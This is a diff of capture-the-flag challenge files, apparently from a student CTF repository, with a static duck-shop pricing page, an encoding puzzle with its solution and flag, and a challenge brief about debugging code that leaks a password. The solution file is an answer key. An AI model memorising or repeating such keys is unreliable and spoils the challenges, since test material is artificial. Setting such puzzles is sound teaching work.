rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link active" aria-current="page"
>Pricing</a
>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<div class="pricing-header p-3 pb-md-4 mx-auto text-center">
<h1 class="display-4 fw-normal">Pricing</h1>
<p class="fs-5 text-muted">
Can't get enough of our ducks? Subscribe to get a weekly, monthly or
yearly duck.
</p>
</div>
<main>
<div class="row row-cols-1 row-cols-md-3 mb-3 text-center">
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm">
<div class="card-header py-3">
<h4 class="my-0 fw-normal">Yearly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€1<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/year</li>
<li>Standard shipping</li>
<li>Email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm">
<div class="card-header py-3">
<h4 class="my-0 fw-normal">Monthly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€15<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/month</li>
<li>Priority shipping</li>
<li>Priority email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm border-primary">
<div class="card-header py-3 text-bg-primary border-primary">
<h4 class="my-0 fw-normal">Weekly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€50<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/week</li>
<li>Express shipping</li>
<li>Phone and email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
</div>
<h2 class="display-6 text-center mb-4">Compare plans</h2>
<div class="table-responsive">
<table class="table text-center">
<thead>
<tr>
<th style="width: 34%"></th>
<th style="width: 22%">Yearly</th>
<th style="width: 22%">Monthly</th>
<th style="width: 22%">Weekly</th>
</tr>
</thead>
<tbody>
<tr>
<th scope="row" class="text-start">Normal ducks</th>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Special ducks</th>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
</tbody>
<tbody>
<tr>
<th scope="row" class="text-start">Custom ducks</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Birthday ducks</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Swap for different duck</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">1 week warranty</th>
<td></td>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
</tbody>
</table>
</div>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
<symbol id="check" viewBox="0 0 16 16">
<path
d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>


View File

@ -0,0 +1,3 @@
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-star-fill" viewBox="0 0 16 16">
<path d="M3.612 15.443c-.386.198-.824-.149-.746-.592l.83-4.73L.173 6.765c-.329-.314-.158-.888.283-.95l4.898-.696L7.538.792c.197-.39.73-.39.927 0l2.184 4.327 4.898.696c.441.062.612.636.282.95l-3.522 3.356.83 4.73c.078.443-.36.79-.746.592L8 13.187l-4.389 2.256z"/>
</svg>


View File

@ -0,0 +1,17 @@
# Full stack encryption
# Text
Hi there! I'm a full stack encrypter, I encrypt stuff for a living.
I recently encrypter my password using my custom framework, but I forgot it and now I'm trying to get it back.
Can you help me out?
NTYgNTQgNTAgNDcgNTMgN2IgNTIgNjEgNGIgNjUgNmMgNDMgNjcgMzMgNTEgN2Q=
Flag Format: IGCTF{...}
Author: Thomas (Dienst CTF)
# Files
None
# How to deploy
N/a
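Review bot: In the challenge text, "I recently encrypter my password" should read "encrypted"; this sentence is shown to participants. The encoded string sits on a bare line, so a Markdown renderer may reflow or restyle it; put it in a code span or fenced block so it can be copied exactly. The section headings (`# Text`, `# Files`, `# How to deploy`) are at the same level as the title, whereas the other challenge READMEs in this commit use `##` for sections.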

View File

@ -0,0 +1,9 @@
# points
medium 40
# How to solve
Users have to first decode from BASE 64, then decode from HEX and then apply the ROT 13 algorithm.
# Flag
IGCTF{EnXryPt3D}
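Review bot: The `# points` section mixes a difficulty and a score in one value ("medium 40") under a lowercase heading, while the other SOLUTION.md files in this commit use a `# Difficulty` heading; split it into difficulty and points for consistency. The three decoding steps are correct for the string in the README, but the write-up would be easier to verify if it listed the intermediate values: Base64 yields space-separated hex bytes, and the hex decodes to `VTPGS{RaKelCg3Q}` before ROT13 gives the flag.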

View File

@ -0,0 +1,12 @@
# Hacking the Cybernukes - Part 1
## Text
National Security has employed you to neutralise the cybernukes by the enemies. These are dangerous virtual rockets that will spam their victims with cat videos. More information can be found on https://youtu.be/K7Hn1rPQouU.
In order to stop the cyber nukes, you will need to breach their firewall. For that, you will first need to find their password. Given is the source code they used for one of their authentication systems. It seems they left some debugging code in that displays the password. Can you get it to print out the password? The authentication software is running on the following connection <show netcat connection>.
## Files
Participants get access to index.rkt
## How to Deploy
Use provided Dockerfile. It will be hosted on port 3000, change it as you like...
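Review bot: The challenge text still contains the placeholder `<show netcat connection>`, and because it is written in bare angle brackets many Markdown renderers will treat it as an HTML tag and drop it, so the sentence would end at "on the following connection" with nothing after it. Replace it with a fenced `nc` line like the one used in the Hack the Jail README, or at least put the placeholder in backticks. "It will be hosted on port 3000, change it as you like..." should also say where the port is set.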

Some files were not shown because too many files have changed in this diff.